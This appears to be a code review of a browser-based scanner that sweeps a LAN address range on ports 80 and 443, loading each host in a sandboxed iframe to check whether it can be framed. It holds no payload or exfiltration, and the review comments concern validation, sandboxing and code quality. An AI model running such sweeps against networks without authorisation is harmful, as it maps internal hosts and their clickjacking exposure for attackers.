const LAN = (new URLSearchParams(document.location.search).get('lan'));
const OUTPUT = document.querySelector('#output');


@ -0,0 +1,15 @@
async function recon(scheme, port) {
for (let target of targets()) {
let url, div, iframe;
url = (scheme + '://' + target + ':' + port + '/');
div = document.createElement('div');
div.id = 'url';
div.innerText = url;
iframe = document.createElement('iframe');
iframe.sandbox = 'allow-same-origin allow-scripts';
iframe.src = url;
OUTPUT.appendChild(div);
OUTPUT.appendChild(iframe);
await sleep();
}
}
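Review bot: Every iteration sets `div.id = 'url'`, so the document ends up with one duplicate id per target, which is invalid HTML and makes the `#url` selector in style.css misleading; use `div.className = 'url';` and change the stylesheet rule to `.url`. The `let url, div, iframe;` declarations can become `const` at the point of use, and the URL is clearer as `` const url = `${scheme}://${target}:${port}/`; ``. The iframe sandbox grants `allow-scripts` to whatever each scanned host serves; if the goal is only to render the page for the PDF, dropping `allow-scripts` limits what a responding host can run inside the scanning browser, and if both flags are needed a comment should say why.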


@ -0,0 +1,7 @@
function sleep() {
return(
new Promise(
resolve => setTimeout(resolve, 1250)
)
);
}
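Review bot: The 1250 ms pause is hard-coded inside `sleep()`, so the per-host wait that `recon()` relies on cannot be tuned without editing this helper; `function sleep(ms = 1250) { return new Promise((resolve) => setTimeout(resolve, ms)); }` keeps the current behaviour and lets callers pass a value. The wrapping `return( ... )` parentheses are noise. A one-line JSDoc, `/** Resolves after ms milliseconds (default 1250). */`, would document the contract.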


@ -0,0 +1,18 @@
function targets() {
let bounds, wholes, hosts;
bounds = LAN.split('-');
wholes = [bounds[0].split('.'), bounds[1].split('.')];
hosts = [parseInt(wholes[0].pop()), parseInt(wholes[1].pop())];
wholes = [wholes[0].join('.'), wholes[1].join('.')];
if (wholes[0] === wholes[1]) {
let whole, targets;
whole = wholes[0];
targets = new Array();
for (let host = hosts[0]; host <= hosts[1]; host++) {
targets.push(whole + '.' + host);
}
return(targets);
} else {
return(new Array());
}
}
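Review bot: `targets()` trusts the `lan` query-string value completely: a value without `-` makes `bounds[1].split` throw a TypeError, `parseInt` is called without a radix, and nothing checks that the host octets are integers in 0–255, so a malformed range either crashes the page or generates impossible addresses. The README documents the accepted format as `192.168.0.X-192.168.0.Y where (X < Y)`, so the function should enforce exactly that and return `[]` otherwise. The rewrite below keeps the same name and return shape and replaces `new Array()` with literals and `const`.
```javascript
function targets() {
  // Accepts only "A.B.C.X-A.B.C.Y" with X <= Y and both octets in 0..255.
  const bounds = LAN.split('-');
  if (bounds.length !== 2) return [];
  const [startOctets, endOctets] = bounds.map((b) => b.split('.'));
  if (startOctets.length !== 4 || endOctets.length !== 4) return [];
  const startHost = Number.parseInt(startOctets.pop(), 10);
  const endHost = Number.parseInt(endOctets.pop(), 10);
  const prefix = startOctets.join('.');
  if (prefix !== endOctets.join('.')) return [];
  if (!Number.isInteger(startHost) || !Number.isInteger(endHost)) return [];
  if (startHost < 0 || endHost > 255 || startHost > endHost) return [];
  const result = [];
  for (let host = startHost; host <= endHost; host++) {
    result.push(`${prefix}.${host}`);
  }
  return result;
}
```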


@ -0,0 +1,8 @@
if (LAN) {
Promise.all(
[
recon('http', 80),
recon('https', 443)
]
);
}
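Review bot: The `Promise.all([...])` result is neither awaited nor given a rejection handler, so any error thrown inside `recon()` surfaces only as an unhandled rejection and the PDF is rendered with partial output and no indication why; `Promise.all([...]).catch((err) => console.error('recon failed', err));` makes the failure visible. Since `recon('http', 80)` and `recon('https', 443)` run concurrently, a comment should say that the pacing in `sleep()` applies per scheme, not overall.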


@ -0,0 +1,21 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" type="text/css" href="./assets/css/style.css?version=1.0.0" />
</head>
<body>
<main>
<section>
<h1>X-FRAME-OPTIONS Scanner</h1>
<div id="output"></div>
</section>
</main>
<script type="text/javascript" src="./assets/js/constants.js?version=1.0.0"></script>
<script type="text/javascript" src="./assets/js/functions/targets.js?version=1.0.0"></script>
<script type="text/javascript" src="./assets/js/functions/sleep.js?version=1.0.0"></script>
<script type="text/javascript" src="./assets/js/functions/recon.js?version=1.0.0"></script>
<script type="text/javascript" src="./assets/js/main.js?version=1.0.0"></script>
</body>
</html>
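Review bot: The `<head>` has no `<title>`, so the PDF Edge prints is titled after the file path; `<title>X-Frame-Options Scanner</title>` fixes that. The `type="text/javascript"` attributes are the default and can be dropped, and the `?version=1.0.0` cache-busting suffixes have little effect on a page opened from the drive rather than a server.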